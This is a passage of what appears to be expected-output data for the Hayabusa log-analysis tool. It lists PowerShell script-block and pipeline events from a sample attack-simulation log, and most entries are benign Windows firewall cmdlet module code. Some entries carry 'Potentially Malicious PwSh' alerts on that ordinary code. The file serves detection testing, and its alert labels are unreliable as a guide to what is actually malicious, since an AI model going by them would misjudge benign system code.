${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.299 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.300 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.301 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.302 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.302 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.338 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.338 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, 